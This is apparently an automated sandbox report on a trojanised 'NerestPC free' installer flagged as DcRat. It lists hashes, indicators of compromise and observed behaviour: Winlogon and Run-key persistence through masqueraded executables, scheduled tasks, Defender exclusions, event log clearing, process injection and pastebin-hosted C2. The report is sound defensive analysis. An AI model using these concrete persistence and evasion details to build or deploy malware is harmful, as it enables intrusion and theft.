Overview
overview
10Static
static
3NerestPC f....1.exe
windows7-x64
10NerestPC f....1.exe
windows10-2004-x64
10NerestPC f...db.dll
ubuntu-24.04-amd64
NerestPC f...pi.dll
windows7-x64
3NerestPC f...pi.dll
windows10-2004-x64
3NerestPC f...pi.dll
windows7-x64
3NerestPC f...pi.dll
windows10-2004-x64
3NerestPC f...db.exe
windows7-x64
3NerestPC f...db.exe
windows10-2004-x64
3Analysis
-
max time kernel
89s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
14-12-2024 17:00
Static task
static1
Behavioral task
behavioral1
Sample
NerestPC free/NerestPCFree 0.31.1.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
NerestPC free/NerestPCFree 0.31.1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
NerestPC free/bin/Adb.dll
Resource
ubuntu2404-amd64-20240523-en
Behavioral task
behavioral4
Sample
NerestPC free/bin/AdbWinApi.dll
Resource
win7-20240903-en
Behavioral task
behavioral5
Sample
NerestPC free/bin/AdbWinApi.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral6
Sample
NerestPC free/bin/AdbWinUsbApi.dll
Resource
win7-20241010-en
Behavioral task
behavioral7
Sample
NerestPC free/bin/AdbWinUsbApi.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral8
Sample
NerestPC free/bin/adb.exe
Resource
win7-20241010-en
Behavioral task
behavioral9
Sample
NerestPC free/bin/adb.exe
Resource
win10v2004-20241007-en
General
-
Target
NerestPC free/NerestPCFree 0.31.1.exe
-
Size
7.0MB
-
MD5
9d0a77bd28d67eab798c50f0c6a24b64
-
SHA1
2de59eddd73ab784cc8f791cd96d7f81741ccae3
-
SHA256
a35479bc985fe56167b824f5d0d9ff96598af672afe8785bc9f87815c11393dc
-
SHA512
25ca283707b61c8149615f7e7958edb886378702ecbcf079191698d686b4a7a39d1be655e44ccf2752e569481e9eb25f3a10e59322c0c97c7e858fb5f9eabb17
-
SSDEEP
196608:i46iIYMaKuKGfjtVlQqtolrkiBJk3b8pA2uW3c:i7YpBDtVlmlgyJ0r
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Modifies WinLogon for persistence 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft Office\\Templates\\1033\\FAX\\WmiPrvSE.exe\", \"C:\\Windows\\ShellNew\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\audiodg.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft Office\\Templates\\1033\\FAX\\WmiPrvSE.exe\", \"C:\\Windows\\ShellNew\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Program Files\\Uninstall Information\\smss.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft Office\\Templates\\1033\\FAX\\WmiPrvSE.exe\", \"C:\\Windows\\ShellNew\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Program Files\\Uninstall Information\\smss.exe\", \"C:\\Windows\\security\\services.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft Office\\Templates\\1033\\FAX\\WmiPrvSE.exe\", \"C:\\Windows\\ShellNew\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Program Files\\Uninstall Information\\smss.exe\", \"C:\\Windows\\security\\services.exe\", \"C:\\fontwin\\MsServerHost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft Office\\Templates\\1033\\FAX\\WmiPrvSE.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft Office\\Templates\\1033\\FAX\\WmiPrvSE.exe\", \"C:\\Windows\\ShellNew\\smss.exe\"" MsServerHost.exe -
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1748 2116 schtasks.exe 78 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1860 2116 schtasks.exe 78 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2368 2116 schtasks.exe 78 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2752 2116 schtasks.exe 78 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2924 2116 schtasks.exe 78 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1164 2116 schtasks.exe 78 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 424 2116 schtasks.exe 78 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1752 2116 schtasks.exe 78 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2080 2116 schtasks.exe 78 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1772 2116 schtasks.exe 78 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1564 2116 schtasks.exe 78 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2260 2116 schtasks.exe 78 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2656 2116 schtasks.exe 78 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1140 2116 schtasks.exe 78 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2512 2116 schtasks.exe 78 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2276 2116 schtasks.exe 78 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2364 2116 schtasks.exe 78 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2236 2116 schtasks.exe 78 -
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
description pid Process procid_target PID 1536 created 1200 1536 twain32.exe 21 PID 1536 created 1200 1536 twain32.exe 21 PID 1536 created 1200 1536 twain32.exe 21 PID 1536 created 1200 1536 twain32.exe 21 PID 1536 created 1200 1536 twain32.exe 21 PID 1536 created 1200 1536 twain32.exe 21 PID 1496 created 1200 1496 updater.exe 21 PID 1496 created 1200 1496 updater.exe 21 PID 1496 created 1200 1496 updater.exe 21 PID 1496 created 1200 1496 updater.exe 21 PID 1496 created 1200 1496 updater.exe 21 PID 1496 created 1200 1496 updater.exe 21 PID 1496 created 1200 1496 updater.exe 21 -
Command and Scripting Interpreter: PowerShell 1 TTPs 23 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2340 powershell.exe 308 powershell.exe 3020 powershell.exe 1500 powershell.exe 1752 powershell.exe 1612 powershell.exe 1532 powershell.exe 3032 powershell.exe 2320 powershell.exe 340 powershell.exe 1972 powershell.exe 2948 powershell.exe 2988 powershell.exe 2372 powershell.exe 2748 powershell.exe 2564 powershell.exe 2404 powershell.exe 2984 powershell.exe 1136 powershell.exe 2584 powershell.exe 2248 powershell.exe 2700 powershell.exe 2988 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 5 IoCs
pid Process 1036 MpDefenderCoreService.exe 1536 twain32.exe 1496 updater.exe 3040 MsServerHost.exe 2156 smss.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx svchost.exe -
Loads dropped DLL 5 IoCs
pid Process 1504 NerestPCFree 0.31.1.exe 1504 NerestPCFree 0.31.1.exe 292 taskeng.exe 1876 cmd.exe 1876 cmd.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 12 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Windows\\security\\services.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Program Files (x86)\\Microsoft Office\\Templates\\1033\\FAX\\WmiPrvSE.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\ShellNew\\smss.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\ShellNew\\smss.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\audiodg.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\audiodg.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files\\Uninstall Information\\smss.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Program Files (x86)\\Microsoft Office\\Templates\\1033\\FAX\\WmiPrvSE.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files\\Uninstall Information\\smss.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Windows\\security\\services.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\MsServerHost = "\"C:\\fontwin\\MsServerHost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MsServerHost = "\"C:\\fontwin\\MsServerHost.exe\"" MsServerHost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 pastebin.com 5 pastebin.com -
Power Settings 1 TTPs 10 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2996 cmd.exe 1520 powercfg.exe 1276 powercfg.exe 2836 powercfg.exe 1472 powercfg.exe 2560 powercfg.exe 556 powercfg.exe 1612 cmd.exe 668 powercfg.exe 1292 powercfg.exe -
Drops file in System32 directory 44 IoCs
description ioc Process File created C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini WMIADAP.EXE File created C:\Windows\system32\perfc011.dat WMIADAP.EXE File created \??\c:\Windows\System32\CSC7D2F785B976C42AAA316FD7FCBF052.TMP csc.exe File created C:\Windows\System32\Tasks\smsss svchost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\perfh010.dat WMIADAP.EXE File created C:\Windows\System32\Tasks\WmiPrvSEW svchost.exe File created C:\Windows\System32\Tasks\servicess svchost.exe File created C:\Windows\System32\Tasks\audiodg svchost.exe File created C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC svchost.exe File opened for modification C:\Windows\system32\PerfStringBackup.INI WMIADAP.EXE File created \??\c:\Windows\System32\9w3j6e.exe csc.exe File created C:\Windows\System32\Tasks\smss svchost.exe File opened for modification C:\Windows\System32\Tasks\smss svchost.exe File created C:\Windows\System32\Tasks\audiodga svchost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\perfc010.dat WMIADAP.EXE File created C:\Windows\System32\Tasks\WmiPrvSE svchost.exe File opened for modification C:\Windows\System32\Tasks\servicess svchost.exe File created C:\Windows\system32\perfc00A.dat WMIADAP.EXE File created C:\Windows\system32\perfh011.dat WMIADAP.EXE File created C:\Windows\system32\PerfStringBackup.TMP WMIADAP.EXE File opened for modification C:\Windows\System32\Tasks\WmiPrvSE svchost.exe File created C:\Windows\System32\Tasks\services svchost.exe File opened for modification C:\Windows\System32\Tasks\services svchost.exe File opened for modification C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC svchost.exe File created C:\Windows\system32\perfc009.dat WMIADAP.EXE File created C:\Windows\system32\perfh009.dat WMIADAP.EXE File opened for modification C:\Windows\System32\Tasks\audiodg svchost.exe File created C:\Windows\System32\Tasks\MsServerHost svchost.exe File opened for modification C:\Windows\System32\Tasks\MsServerHost svchost.exe File opened for modification C:\Windows\System32\Tasks\audiodga svchost.exe File opened for modification C:\Windows\System32\Tasks\MsServerHostM svchost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\perfh007.dat WMIADAP.EXE File created C:\Windows\system32\perfh00A.dat WMIADAP.EXE File created C:\Windows\system32\perfc00C.dat WMIADAP.EXE File opened for modification C:\Windows\System32\Tasks\WmiPrvSEW svchost.exe File opened for modification C:\Windows\System32\Tasks\smsss svchost.exe File created C:\Windows\system32\wbem\Performance\WmiApRpl_new.h WMIADAP.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\perfc007.dat WMIADAP.EXE File created C:\Windows\system32\perfh00C.dat WMIADAP.EXE File created C:\Windows\System32\Tasks\MsServerHostM svchost.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1536 set thread context of 2692 1536 twain32.exe 44 PID 1496 set thread context of 316 1496 updater.exe 69 PID 1496 set thread context of 2544 1496 updater.exe 76 PID 1496 set thread context of 1252 1496 updater.exe 77 -
Drops file in Program Files directory 6 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\WmiPrvSE.exe MsServerHost.exe File created C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\24dbde2999530e MsServerHost.exe File created C:\Program Files\Google\Chrome\updater.exe twain32.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Uninstall Information\smss.exe MsServerHost.exe File created C:\Program Files\Uninstall Information\69ddcba757bf72 MsServerHost.exe -
Drops file in Windows directory 9 IoCs
description ioc Process File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf svchost.exe File created C:\Windows\inf\WmiApRpl\WmiApRpl.h WMIADAP.EXE File opened for modification C:\Windows\security\services.exe MsServerHost.exe File created C:\Windows\ShellNew\smss.exe MsServerHost.exe File created C:\Windows\ShellNew\69ddcba757bf72 MsServerHost.exe File opened for modification C:\Windows\inf\WmiApRpl\WmiApRpl.h WMIADAP.EXE File created C:\Windows\inf\WmiApRpl\0009\WmiApRpl.ini WMIADAP.EXE File created C:\Windows\security\services.exe MsServerHost.exe File created C:\Windows\security\c5b4cb5e9653cc MsServerHost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2272 sc.exe 2476 sc.exe 2852 sc.exe 2240 sc.exe 2552 sc.exe 2896 sc.exe 2972 sc.exe 596 sc.exe 1936 sc.exe 3060 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NerestPCFree 0.31.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MpDefenderCoreService.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1712 PING.EXE -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 6 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e0eacdbf494edb01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT dialer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates dialer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs dialer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs dialer.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1712 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 20 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1748 schtasks.exe 1860 schtasks.exe 2368 schtasks.exe 1164 schtasks.exe 424 schtasks.exe 2260 schtasks.exe 1140 schtasks.exe 2364 schtasks.exe 2080 schtasks.exe 1564 schtasks.exe 1604 schtasks.exe 2080 schtasks.exe 2752 schtasks.exe 2924 schtasks.exe 2656 schtasks.exe 1752 schtasks.exe 1772 schtasks.exe 2512 schtasks.exe 2276 schtasks.exe 2236 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1536 twain32.exe 1536 twain32.exe 2948 powershell.exe 1536 twain32.exe 1536 twain32.exe 1536 twain32.exe 1536 twain32.exe 1536 twain32.exe 1536 twain32.exe 1536 twain32.exe 1536 twain32.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2700 powershell.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 1536 twain32.exe 1536 twain32.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe 2692 dialer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2948 powershell.exe Token: SeDebugPrivilege 2692 dialer.exe Token: SeAuditPrivilege 856 svchost.exe Token: SeDebugPrivilege 2700 powershell.exe Token: SeShutdownPrivilege 556 powercfg.exe Token: SeShutdownPrivilege 1520 powercfg.exe Token: SeShutdownPrivilege 1276 powercfg.exe Token: SeShutdownPrivilege 2836 powercfg.exe Token: SeAssignPrimaryTokenPrivilege 856 svchost.exe Token: SeIncreaseQuotaPrivilege 856 svchost.exe Token: SeSecurityPrivilege 856 svchost.exe Token: SeTakeOwnershipPrivilege 856 svchost.exe Token: SeLoadDriverPrivilege 856 svchost.exe Token: SeSystemtimePrivilege 856 svchost.exe Token: SeBackupPrivilege 856 svchost.exe Token: SeRestorePrivilege 856 svchost.exe Token: SeShutdownPrivilege 856 svchost.exe Token: SeSystemEnvironmentPrivilege 856 svchost.exe Token: SeUndockPrivilege 856 svchost.exe Token: SeManageVolumePrivilege 856 svchost.exe Token: SeAssignPrimaryTokenPrivilege 856 svchost.exe Token: SeIncreaseQuotaPrivilege 856 svchost.exe Token: SeSecurityPrivilege 856 svchost.exe Token: SeTakeOwnershipPrivilege 856 svchost.exe Token: SeLoadDriverPrivilege 856 svchost.exe Token: SeSystemtimePrivilege 856 svchost.exe Token: SeBackupPrivilege 856 svchost.exe Token: SeRestorePrivilege 856 svchost.exe Token: SeShutdownPrivilege 856 svchost.exe Token: SeSystemEnvironmentPrivilege 856 svchost.exe Token: SeUndockPrivilege 856 svchost.exe Token: SeManageVolumePrivilege 856 svchost.exe Token: SeAssignPrimaryTokenPrivilege 856 svchost.exe Token: SeIncreaseQuotaPrivilege 856 svchost.exe Token: SeSecurityPrivilege 856 svchost.exe Token: SeTakeOwnershipPrivilege 856 svchost.exe Token: SeLoadDriverPrivilege 856 svchost.exe Token: SeSystemtimePrivilege 856 svchost.exe Token: SeBackupPrivilege 856 svchost.exe Token: SeRestorePrivilege 856 svchost.exe Token: SeShutdownPrivilege 856 svchost.exe Token: SeSystemEnvironmentPrivilege 856 svchost.exe Token: SeUndockPrivilege 856 svchost.exe Token: SeManageVolumePrivilege 856 svchost.exe Token: SeAssignPrimaryTokenPrivilege 856 svchost.exe Token: SeIncreaseQuotaPrivilege 856 svchost.exe Token: SeSecurityPrivilege 856 svchost.exe Token: SeTakeOwnershipPrivilege 856 svchost.exe Token: SeLoadDriverPrivilege 856 svchost.exe Token: SeSystemtimePrivilege 856 svchost.exe Token: SeBackupPrivilege 856 svchost.exe Token: SeRestorePrivilege 856 svchost.exe Token: SeShutdownPrivilege 856 svchost.exe Token: SeSystemEnvironmentPrivilege 856 svchost.exe Token: SeUndockPrivilege 856 svchost.exe Token: SeManageVolumePrivilege 856 svchost.exe Token: SeAssignPrimaryTokenPrivilege 856 svchost.exe Token: SeIncreaseQuotaPrivilege 856 svchost.exe Token: SeSecurityPrivilege 856 svchost.exe Token: SeTakeOwnershipPrivilege 856 svchost.exe Token: SeLoadDriverPrivilege 856 svchost.exe Token: SeSystemtimePrivilege 856 svchost.exe Token: SeBackupPrivilege 856 svchost.exe Token: SeRestorePrivilege 856 svchost.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2856 conhost.exe 1512 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1504 wrote to memory of 1036 1504 NerestPCFree 0.31.1.exe 30 PID 1504 wrote to memory of 1036 1504 NerestPCFree 0.31.1.exe 30 PID 1504 wrote to memory of 1036 1504 NerestPCFree 0.31.1.exe 30 PID 1504 wrote to memory of 1036 1504 NerestPCFree 0.31.1.exe 30 PID 1504 wrote to memory of 1536 1504 NerestPCFree 0.31.1.exe 31 PID 1504 wrote to memory of 1536 1504 NerestPCFree 0.31.1.exe 31 PID 1504 wrote to memory of 1536 1504 NerestPCFree 0.31.1.exe 31 PID 1504 wrote to memory of 1536 1504 NerestPCFree 0.31.1.exe 31 PID 1036 wrote to memory of 2780 1036 MpDefenderCoreService.exe 32 PID 1036 wrote to memory of 2780 1036 MpDefenderCoreService.exe 32 PID 1036 wrote to memory of 2780 1036 MpDefenderCoreService.exe 32 PID 1036 wrote to memory of 2780 1036 MpDefenderCoreService.exe 32 PID 2360 wrote to memory of 2972 2360 cmd.exe 37 PID 2360 wrote to memory of 2972 2360 cmd.exe 37 PID 2360 wrote to memory of 2972 2360 cmd.exe 37 PID 2360 wrote to memory of 3060 2360 cmd.exe 38 PID 2360 wrote to memory of 3060 2360 cmd.exe 38 PID 2360 wrote to memory of 3060 2360 cmd.exe 38 PID 2360 wrote to memory of 2272 2360 cmd.exe 39 PID 2360 wrote to memory of 2272 2360 cmd.exe 39 PID 2360 wrote to memory of 2272 2360 cmd.exe 39 PID 2360 wrote to memory of 2476 2360 cmd.exe 40 PID 2360 wrote to memory of 2476 2360 cmd.exe 40 PID 2360 wrote to memory of 2476 2360 cmd.exe 40 PID 2360 wrote to memory of 2852 2360 cmd.exe 41 PID 2360 wrote to memory of 2852 2360 cmd.exe 41 PID 2360 wrote to memory of 2852 2360 cmd.exe 41 PID 1536 wrote to memory of 2692 1536 twain32.exe 44 PID 2692 wrote to memory of 432 2692 dialer.exe 5 PID 2692 wrote to memory of 480 2692 dialer.exe 6 PID 2692 wrote to memory of 496 2692 dialer.exe 7 PID 2692 wrote to memory of 504 2692 dialer.exe 8 PID 2692 wrote to memory of 604 2692 dialer.exe 9 PID 2692 wrote to memory of 684 2692 dialer.exe 10 PID 2692 wrote to memory of 752 2692 dialer.exe 11 PID 2692 wrote to memory of 808 2692 dialer.exe 12 PID 2692 wrote to memory of 856 2692 dialer.exe 13 PID 2692 wrote to memory of 964 2692 dialer.exe 15 PID 2692 wrote to memory of 112 2692 dialer.exe 16 PID 2692 wrote to memory of 1020 2692 dialer.exe 17 PID 2692 wrote to memory of 1060 2692 dialer.exe 18 PID 2692 wrote to memory of 1100 2692 dialer.exe 19 PID 2692 wrote to memory of 1168 2692 dialer.exe 20 PID 2692 wrote to memory of 1200 2692 dialer.exe 21 PID 2692 wrote to memory of 1544 2692 dialer.exe 23 PID 2692 wrote to memory of 836 2692 dialer.exe 24 PID 2692 wrote to memory of 2448 2692 dialer.exe 26 PID 2692 wrote to memory of 2056 2692 dialer.exe 27 PID 2692 wrote to memory of 1536 2692 dialer.exe 31 PID 2692 wrote to memory of 2996 2692 dialer.exe 42 PID 2692 wrote to memory of 2960 2692 dialer.exe 43 PID 2692 wrote to memory of 2700 2692 dialer.exe 45 PID 2692 wrote to memory of 2708 2692 dialer.exe 46 PID 2996 wrote to memory of 556 2996 cmd.exe 47 PID 2996 wrote to memory of 556 2996 cmd.exe 47 PID 2996 wrote to memory of 556 2996 cmd.exe 47 PID 2692 wrote to memory of 556 2692 dialer.exe 47 PID 2996 wrote to memory of 1520 2996 cmd.exe 48 PID 2996 wrote to memory of 1520 2996 cmd.exe 48 PID 2996 wrote to memory of 1520 2996 cmd.exe 48 PID 2692 wrote to memory of 1520 2692 dialer.exe 48 PID 2692 wrote to memory of 1520 2692 dialer.exe 48 PID 2700 wrote to memory of 1604 2700 powershell.exe 49 PID 2700 wrote to memory of 1604 2700 powershell.exe 49 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:432
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:480
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:604
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:1544
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵
- Checks BIOS information in registry
- Checks processor information in registry
- Enumerates system info in registry
PID:2116 -
